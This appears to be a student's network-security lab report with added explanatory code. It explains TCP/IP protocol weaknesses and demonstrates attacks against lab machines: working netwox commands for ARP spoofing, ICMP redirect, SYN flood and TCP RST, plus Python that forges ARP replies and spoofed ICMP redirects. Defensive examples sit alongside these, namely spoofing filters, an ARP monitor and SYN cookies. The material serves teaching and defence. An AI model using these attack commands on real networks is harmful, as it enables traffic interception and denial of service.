20199111 2019-2020-2 "Network Attack and Defense Practice" Week 5 Assignment

1. Practice content

Network security attributes

From the viewpoint of security attributes, confidentiality, integrity and availability form the three basic attributes of network security, also known as the CIA triad (the "golden triangle" security model). The ITU X.800 security architecture defines two further attributes: authenticity (authentication) and non-repudiation.

  • Confidentiality: information on the network is protected from access and use by unauthorized entities; it is usually enforced with encryption.

  • Integrity: information cannot be altered by unauthorized parties; it stays unchanged during storage and transmission and is neither corrupted nor lost.

  • Availability: authorized entities can access and use the information and services they need whenever they need them.

  • Authenticity: each communicating party really is the entity it claims to be, not an impostor.

  • Non-repudiation: no party can later deny the operations it performed, covering both the action itself and the time at which it occurred; sometimes called non-repudiation and auditability.

The basic model of network attacks

There are four basic models of network attack: interception, interruption, tampering and forgery. Interception is a passive attack, realised by sniffing and eavesdropping; interruption is an active attack, realised by denial of service; forgery is realised by spoofing; tampering is usually carried out through a man-in-the-middle attack, which in turn typically has to be combined with spoofing.

TCP / IP network protocol stack security flaws and attack techniques

The TCP/IP protocol stack is designed as a layered model: network interface layer, Internet layer, transport layer and application layer. Each layer has its own functions and its own protocols, and each layer has security problems of its own, as follows.

Network layer protocol attacks

IP source address spoofing

IP forwarding only looks at the destination address of a packet; by design it never verifies that the source address is genuine. An attacker can therefore rewrite the source field of the IP header to a false address, both to deceive the target and to hide the true origin of the packet.

Precautions include:

  • Use randomized initial sequence numbers, so that a remote attacker cannot predict the sequence number and complete a TCP handshake with a spoofed source address.

  • Use a protocol such as IPsec that provides security at the network layer, so that transmitted packets are encrypted and authenticated.

  • Avoid trust policies based on IP addresses; authenticate users with cryptographic mechanisms instead.

  • Implement packet filtering on routers and gateways.
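The packet-filtering precaution, as an added example that is not part of the original post: a source-address filter of the kind a border router applies (ingress filtering on the outside interface, egress filtering on the inside one, i.e. BCP 38). It assumes a router with a "lan" interface on the page's lab network 192.168.6.0/24 and a "wan" interface to the outside; the outside addresses in the sample traffic are RFC 5737 documentation addresses used as placeholders.

```python
"""Anti-spoofing (ingress/egress) source-address filter for a border router.

Added example, not from the original post.  Assumes a "lan" interface on
192.168.6.0/24 (the page's lab network) and a "wan" interface to the outside.
"""
import ipaddress

INTERNAL = [ipaddress.ip_network("192.168.6.0/24")]          # assumed LAN prefix

# Sources that are never legitimate on the WAN side: private, loopback,
# link-local, multicast and reserved space.
BOGONS = [ipaddress.ip_network(p) for p in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3",
)]


def _within(addr, prefixes):
    return any(addr in p for p in prefixes)


def filter_decision(iface, src):
    """Return (action, reason) for a packet with source src arriving on iface.

    Ingress filtering (wan): a packet from outside must not claim an inside
    or bogon source.  Egress filtering (lan): a packet from inside must use
    one of our own prefixes, so our own hosts cannot spoof other networks.
    """
    s = ipaddress.ip_address(src)
    if iface == "wan":
        if _within(s, INTERNAL):
            return "drop", "outside packet claims internal source"
        if _within(s, BOGONS):
            return "drop", "bogon source"
        return "forward", "ok"
    if iface == "lan":
        if not _within(s, INTERNAL):
            return "drop", "internal host spoofing foreign source"
        return "forward", "ok"
    return "drop", "unknown interface"


# Constructed sample traffic: (arrival interface, source address).
SAMPLE = [
    ("wan", "198.51.100.7"),    # normal inbound packet
    ("wan", "192.168.6.4"),     # spoofed: outside packet claiming to be the SEED target
    ("wan", "10.1.2.3"),        # bogon source
    ("lan", "192.168.6.9"),     # normal outbound packet
    ("lan", "203.0.113.9"),     # LAN host spoofing an outside address
]


def apply_filter(samples=SAMPLE):
    """Run every sample through the filter; returns (iface, src, action, reason)."""
    return [(iface, src, *filter_decision(iface, src)) for iface, src in samples]
```

The filter cannot tell a spoofed address from a genuine one in general; it only removes the cases that are impossible given the topology, which is exactly why the list above pairs it with cryptographic authentication rather than relying on it alone.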

ARP spoofing

The attacker sends forged ARP messages on a wired Ethernet or wireless LAN so that a chosen IP address becomes associated with a spoofed MAC address.

ARP's security weakness lies in how it resolves an IP address to a MAC address. On one hand, it broadcasts a request on the local segment but never verifies that the reply is genuine; on the other hand, to improve efficiency it caches the results, and it accepts unsolicited ARP replies as valid information. This makes it very easy to inject a forged IP-to-MAC mapping into a host's ARP cache and thereby deceive it.

Precautions include:

  • Static binding of the IP-to-MAC mapping for important hosts

  • Use suitable ARP-spoofing detection and prevention tools

  • Divide the network into VLANs (virtual subnets)

  • Encrypt transmitted data

Routing ICMP redirect attack

The attacker impersonates the router and sends forged ICMP redirect (route control) packets, so that the target host's chosen route passes through the attacker, who can then sniff the traffic or impersonate the other end.

An ICMP redirect attack uses ICMP redirect messages to change the victim's routing table: by sending a redirect message to the target machine while posing as the router, the attacker makes the target send its datagrams to the attacking machine, which can then monitor them.

Precautions include:

  • Filter ICMP packets by type

  • Set up firewall filtering rules

  • Check whether an ICMP redirect message really comes from the local router

Transport Layer Attack

TCP RST attack

This technique forges packets to interfere with a TCP connection: a forged TCP reset (RST) packet closes the TCP session outright.

TCP session hijacking attacks

The attacker must be able to sniff the segments exchanged between the two hosts of an ongoing TCP connection, so as to learn the source IP, source TCP port, destination IP and destination TCP port, and from them the sequence number (seq) and acknowledgement number (ack) that one host expects in the next segment from the other. The attacker then sends a TCP segment carrying a payload to one host before the legitimate peer sends its next segment; if that host accepts the attack segment on the strength of the intercepted connection parameters, the attacker has in effect taken over the legitimate TCP session between itself and the attacked host. Because the attack segment carries a payload, the sequence number that the attacked host expects next (and so the acknowledgement number it sends back) is advanced, and the legitimate peer's next segment is rejected by the attacked host.

Precautions include:

  • Disable source routing on hosts

  • Take measures against ARP spoofing

  • Take measures against ICMP redirects

TCP SYN Flood Denial of Service Attack

Exploits a weakness of the TCP handshake: the attacker sends a large number of bogus TCP connection requests (SYN segments), so that the attacked host exhausts its resources (half-open connection queue, CPU or memory) and can no longer serve legitimate clients.

Precautions include:

  • SYN cookies

  • Address state monitoring on the firewall

UDP Flood Denial of Service Attack

A UDP flood is a denial-of-service attack in which a large number of UDP packets are sent to the target server; the server's attempts to respond to them overwhelm its processing capacity. The firewall protecting the target server may also be exhausted by the flood, so that legitimate traffic is denied service.

Precautions include:

  • Disable or filter unneeded services that listen and respond on UDP

  • Use firewalls and proxies at key points in the network to filter out unexpected traffic

TCP / IP network protocol stack attack prevention measures

  • Monitoring, prevention and security hardening

  • Improved security of network protocols

  • Next-generation Internet protocols

2. Practice

2.1 ARP spoofing attack

Host                IP address      MAC address
Ubuntu attacker     192.168.6.9     00:0c:29:d3:e0:97
Windows target      192.168.6.124
SEEDUbuntu target   192.168.6.4

Install netwox on Ubuntu: apt-get install netwox

Then start the ARP spoofing attack with netwox.

At the netwox prompt enter 5, then tool number 80 (periodically send ARP replies).

After obtaining the usage of tool 80, enter:

netwox 80 -e 00:0c:29:d3:e0:97 -i 192.168.6.4  # periodically send ARP replies telling requesters that 192.168.6.4 (SEED target) has MAC address 00:0c:29:d3:e0:97 (attacker)

On the Windows target enter arp -a and observe the change in its ARP cache table: the attack succeeded.
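The frame that netwox 80 keeps sending, together with the detection side of the "ARP prevention tools" precaution, as an added example that is not part of the original post or of netwox: it builds an unsolicited ARP reply claiming that 192.168.6.4 is at the attacker's MAC, parses it back, and runs an arpwatch-style monitor that alerts when the MAC claimed for an IP differs from the binding already recorded. The attacker MAC and the IP addresses are the lab values above; the real MAC of the SEED target and the MAC of the Windows target are assumed placeholders.

```python
"""Forged ARP reply and an arpwatch-style cache-poisoning detector.

Added example, not from the original post or from netwox.  Attacker MAC and
IP addresses are the page's lab values; SEED_REAL_MAC and WIN_MAC are assumed.
"""
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2
ATTACKER_MAC = "00:0c:29:d3:e0:97"
SEED_IP = "192.168.6.4"
SEED_REAL_MAC = "00:0c:29:aa:bb:cc"                      # assumed placeholder
WIN_IP, WIN_MAC = "192.168.6.124", "00:11:22:33:44:55"   # MAC is an assumed placeholder


def mac_bytes(mac): return bytes.fromhex(mac.replace(":", ""))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_bytes(ip): return bytes(int(o) for o in ip.split("."))
def ip_str(b): return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header (14 bytes) + ARP reply (28 bytes) in RFC 826 layout."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # htype, ptype, hlen, plen, op
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)          # "sender_ip is at sender_mac"
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return (op, mac_str(frame[22:28]), ip_str(frame[28:32]),
            mac_str(frame[32:38]), ip_str(frame[38:42]))


def monitor(frames, static=None):
    """Learn IP->MAC from ARP replies and alert whenever a known binding changes.

    `static` seeds the table with pinned bindings (the static-binding
    precaution).  The first mapping learned for an IP is kept; later
    conflicting claims only produce alerts, they never overwrite it.
    """
    table = dict(static or {})
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, smac, sip, _, _ = parsed
        known = table.get(sip)
        if known is None:
            table[sip] = smac
        elif known != smac:
            alerts.append(f"{sip} changed {known} -> {smac}")
    return table, alerts


# Constructed traffic: the genuine reply from the SEED host, then the
# attacker's forged reply as sent periodically by netwox 80.
LEGIT = build_arp_reply(SEED_REAL_MAC, SEED_IP, WIN_MAC, WIN_IP)
FORGED = build_arp_reply(ATTACKER_MAC, SEED_IP, WIN_MAC, WIN_IP)
```

Note what the monitor cannot do: if the forged reply is the first one it ever sees for 192.168.6.4, there is nothing to compare against and no alert is raised, which is why the static-binding precaution (the `static` table) matters for hosts such as gateways.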

2.2 ICMP redirect attack

Use netwox tool 86 for the ICMP redirect attack; on the attacker enter:

netwox 86 -f "host 192.168.6.124" -g 192.168.6.9 -i 192.168.6.1 # whenever a packet of 192.168.6.124 (Windows target) is sniffed, send an ICMP redirect in the name of 192.168.6.1 so that 192.168.6.9 (attacker) becomes its default route

Capture with Wireshark: you can see that when the Windows target opens a web page, its packets go through the attacker as the default route.

Routing table after the attack (in the experiment the Windows target kept showing an error when a website was entered, so a new Windows target 192.168.6.3 was used; once the problem was solved, browsing the web worked normally; see Problem 1).
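The redirect that netwox 86 sends, and the host-side judgement from the precautions list ("check whether the redirect really comes from the local router"), as an added example that is not part of the original post or of netwox. It crafts an ICMP host redirect (type 5, code 1) with a spoofed source of 192.168.6.1 and a new gateway of 192.168.6.9, then evaluates it under two host policies modelled on Linux's accept_redirects=0 and secure_redirects=1 sysctls. The destination 203.0.113.10 of the victim's original datagram is an assumed placeholder.

```python
"""ICMP redirect: craft the message netwox 86 sends, then judge it as a host.

Added example, not from the original post or from netwox.  Addresses are the
page's lab values; 203.0.113.10 is an assumed placeholder destination.
"""
import ipaddress
import struct


def checksum(data):
    """Internet checksum (RFC 1071); data is zero-padded to an even length."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def packed(ip):
    return ipaddress.ip_address(ip).packed


def ip_header(src, dst, proto, payload_len, ttl=64):
    """Minimal 20-byte IPv4 header with a valid header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0,
                      ttl, proto, 0, packed(src), packed(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def build_redirect(spoofed_src, victim, new_gw, original_datagram):
    """IP packet carrying an ICMP host redirect (type 5, code 1) to the victim.

    Per RFC 792 the body holds the new gateway followed by the IP header and
    first 8 bytes of the datagram that supposedly triggered the redirect.
    """
    icmp = struct.pack("!BBH4s", 5, 1, 0, packed(new_gw)) + original_datagram[:28]
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    return ip_header(spoofed_src, victim, 1, len(icmp)) + icmp


def evaluate_redirect(packet, policy, my_gateway, my_subnet):
    """What the receiving host does with the redirect, as a verdict string.

    policy "off"    : never honour redirects (accept_redirects=0).
    policy "secure" : honour only if the sender is our configured gateway and
                      the new gateway is on-link (secure_redirects=1).
    """
    ihl = (packet[0] & 0x0F) * 4
    src = str(ipaddress.ip_address(packet[12:16]))
    icmp = packet[ihl:]
    if checksum(icmp) != 0:                 # an intact ICMP message sums to zero
        return "drop: bad checksum"
    if icmp[0] != 5:
        return "drop: not a redirect"
    new_gw = ipaddress.ip_address(icmp[4:8])
    if policy == "off":
        return "drop: redirects disabled"
    if src != my_gateway:
        return "drop: not from our gateway"
    if new_gw not in ipaddress.ip_network(my_subnet):
        return "drop: new gateway off-link"
    return f"accept: route via {new_gw}"


# Constructed: the victim's original datagram (IP header + 8 bytes of TCP header)
# and the redirect the attacker sends in response to sniffing it.
ORIGINAL = ip_header("192.168.6.124", "203.0.113.10", 6, 8) + struct.pack("!HHI", 49152, 80, 1)
ATTACK = build_redirect("192.168.6.1", "192.168.6.124", "192.168.6.9", ORIGINAL)
```

The instructive result is that the "secure" policy accepts the forged redirect: the attacker spoofs the gateway's address and sits on the same subnet, so both checks pass. Checking the apparent source only stops a clumsy attacker; a host that does not need redirects should disable them outright.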

2.3 SYN Flood attack

The Windows target initiates an ftp connection and establishes it.

Use netwox tool 76 for the SYN flood attack; enter:

netwox 76 -i 192.168.6.3  -p 21 # the ftp port is 21; for other services the port number differs

Now initiate the ftp connection again: it reports a connection timeout.
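The SYN-cookie precaution from the theory section, as an added example that is not part of the original post: the server answers each SYN with an initial sequence number that encodes everything it needs, keeps no half-open state, and only allocates a connection when the final ACK carries a cookie that verifies. The layout follows the classic scheme (top 5 bits: time counter mod 32; next 3 bits: MSS index; low 24 bits: keyed hash of the 4-tuple, counter and client ISN), using HMAC-SHA256 with a fixed secret so it runs offline; the Linux implementation differs in detail. The target address and ftp port are the lab values; the client port 40000 and all sequence numbers are assumed.

```python
"""SYN cookies: answer a SYN without keeping state, verify the cookie on the ACK.

Added example, not from the original post.  SECRET, the client port and the
sequence numbers are assumed; the real kernel code differs in detail.
"""
import hashlib
import hmac
import struct

SECRET = b"per-boot random secret -- fixed here so the example runs offline"
MSS_TABLE = (536, 1220, 1440, 1460)     # MSS values encodable in 3 bits
TICK = 64                               # seconds per step of the time counter


def _ip4(s):
    return bytes(int(o) for o in s.split("."))


def _hash24(src_ip, src_port, dst_ip, dst_port, count, client_isn):
    """24-bit keyed hash binding the cookie to this 4-tuple, tick and client ISN."""
    msg = struct.pack("!4sH4sHII", _ip4(src_ip), src_port, _ip4(dst_ip),
                      dst_port, count, client_isn)
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, mss, now):
    """Server ISN to put in the SYN/ACK; nothing about the client is stored."""
    count = (int(now) // TICK) & 0x1F
    fitting = [i for i, m in enumerate(MSS_TABLE) if m <= mss]
    mss_idx = fitting[-1] if fitting else 0        # clamp to the smallest entry
    h = _hash24(src_ip, src_port, dst_ip, dst_port, count, client_isn)
    return (count << 27) | (mss_idx << 24) | h


def verify_cookie(src_ip, src_port, dst_ip, dst_port, ack_seq, client_seq, now):
    """Check the handshake's final ACK; return the MSS to use, or None to reject.

    ack_seq is the ACK's acknowledgement number (cookie + 1) and client_seq its
    sequence number (client ISN + 1); both are recovered from the ACK itself.
    """
    cookie = (ack_seq - 1) & 0xFFFFFFFF
    client_isn = (client_seq - 1) & 0xFFFFFFFF
    count = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    now_count = (int(now) // TICK) & 0x1F
    if (now_count - count) & 0x1F > 1:             # accept this tick and the previous one
        return None
    if (cookie & 0xFFFFFF) != _hash24(src_ip, src_port, dst_ip, dst_port, count, client_isn):
        return None
    return MSS_TABLE[mss_idx]
```

With cookies enabled the flood from netwox 76 costs the server one hash per SYN and no memory; the trade-off is that TCP options other than the encoded MSS are lost for connections completed via a cookie, which is why stacks only fall back to cookies once the SYN queue is full.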

2.4 TCP RST attack

192.168.6.3 initiates an ftp connection to 192.168.6.124 and establishes it; then on the attacker enter:

netwox 78 -i 192.168.6.124

Back on 192.168.6.3, the connection has been dropped.

2.5 TCP session hijacking attacks

Establish an ftp connection as above.

Use the hunt tool: install it with apt-get install hunt, then type hunt to start it.

3. The problems and solutions encountered in the study

  • Problem 1: the Windows target frequently showed an error saying "runtime error" when opening pages.

  • Solution to Problem 1: change the settings so that this kind of error is not reported: in IE open the "Internet Options" dialog, switch to the "Advanced" tab and check "Disable script debugging".

4. Practice summary

  • The experiments took a lot of time; before practising I spent a long time understanding the principles, since I had learned some of these attacks as an undergraduate but had almost forgotten them (sorry for muddling through those undergraduate classes). Reviewing these attacks was also a review of networking material.

  • While learning new material I should often look back and review, rather than being like the bear picking corn that drops one ear as it picks the next.

Origin www.cnblogs.com/yumiao9111/p/12593795.html